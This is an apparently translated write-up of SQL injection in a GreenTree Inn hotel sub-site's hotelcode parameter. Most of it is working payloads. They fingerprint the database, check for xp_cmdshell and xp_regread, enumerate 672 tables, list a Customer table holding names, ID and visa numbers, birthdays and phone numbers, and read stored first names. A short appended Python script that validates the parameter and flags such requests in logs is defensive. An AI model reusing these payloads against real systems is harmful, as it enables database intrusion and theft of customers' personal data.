SQL injection vulnerability in a sub-site of GreenTree Inn (格林豪泰酒店): :8080/frontinvest/roomdetail.aspx?hotelcode=531001

Input 'and'1'='1

Input 'and'1'='2

Check the database version:
:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1=(select @@VERSION) and '1'='1

Current database name

Local service name

24 databases:
:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 24= (select count(name) from master.dbo.sysdatabases) and '1'='1

XP_CMDSHELL exists:
:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (Select count(name) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') and '1'='1

The XP_regread extended stored procedure exists

Enumerating table names:
:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (select top 1 name from sysobjects where xtype='u' ) and '1'='1

select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount')
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist')
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist','Iccard_Request','m_initrebate','Customer')
There are 672 tables in total, so they are not all listed here:
:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 672= ( select count(name) from sysobjects where xtype='u') and '1'='1

Viewing a table's columns, taking Customer as an example: 39 columns

As follows:
CustomerCode
FirstName
LastName
MiddleName
NickName
Gender
Birthday
NationalityID
Race
Title
Language1
Language2
CustomerTypeID
TravelAgentID
CustomerOrigin
Region1
Region2
Note1
Note2
Company
Address
Telephone
Zip
VisaID
ExpirationDate
IDTypeID
IDNumber
VIPLevel
VIPNumber
CreateDate
UploadFlag
Priority
Mobile
CompanyTel
CompanyFax
MemberType
MemberNo
UploadDate
HotelCode
Reading one column:
:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (select top 1 FirstName from Customer) and '1'='1
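
A defender-side triage of the requests quoted in this report, as an added example that is not part of the original write-up: it accepts a hotelcode only when it is digits, and labels what a rejected value references so the requests can be found in web-server logs. The digits-only rule (inferred from 531001), the function names and the sample request URIs are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote_plus, urlsplit

# Assumption: a legitimate hotelcode is digits only, like 531001 on this page.
HOTELCODE_OK = re.compile(r"\d{1,10}")

# What a rejected value references; names are chosen for this example.
MARKERS = {
    "quote": re.compile(r"'"),
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "system_catalog": re.compile(r"\bsys(objects|databases)\b", re.I),
    "extended_proc": re.compile(r"\bxp_\w+", re.I),
    "server_global": re.compile(r"@@\w+"),
}

def triage(request_uri):
    """Return (accepted, marker names) for the hotelcode in one request URI."""
    query = urlsplit(request_uri).query
    values = parse_qs(query, keep_blank_values=True).get("hotelcode", [])
    if len(values) != 1:
        return False, ["missing_or_repeated"]
    if HOTELCODE_OK.fullmatch(values[0]):
        return True, []
    return False, sorted(n for n, rx in MARKERS.items() if rx.search(values[0]))

def flagged(request_uris):
    """Keep only rejected requests, paired with their markers, for review."""
    results = ((uri, triage(uri)) for uri in request_uris)
    return [(uri, marks) for uri, (ok, marks) in results if not ok]

# Constructed sample requests modelled on the ones quoted in this report.
BASE = "/frontinvest/roomdetail.aspx?hotelcode="
SAMPLES = [BASE + quote_plus(v) for v in (
    "531001",
    "531001' and '1'='1",
    "531001' and 1=(select @@VERSION) and '1'='1",
    "531001' and 1=(select count(name) from master.dbo.sysobjects "
    "where xtype='X' and name='xp_cmdshell') and '1'='1",
)]

if __name__ == "__main__":
    for uri, marks in flagged(SAMPLES):
        print(",".join(marks) or "non_numeric", uri)
```

The same digits-only check belongs in the page handler before the value reaches the database, together with a parameterized query so the value is never concatenated into SQL text.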
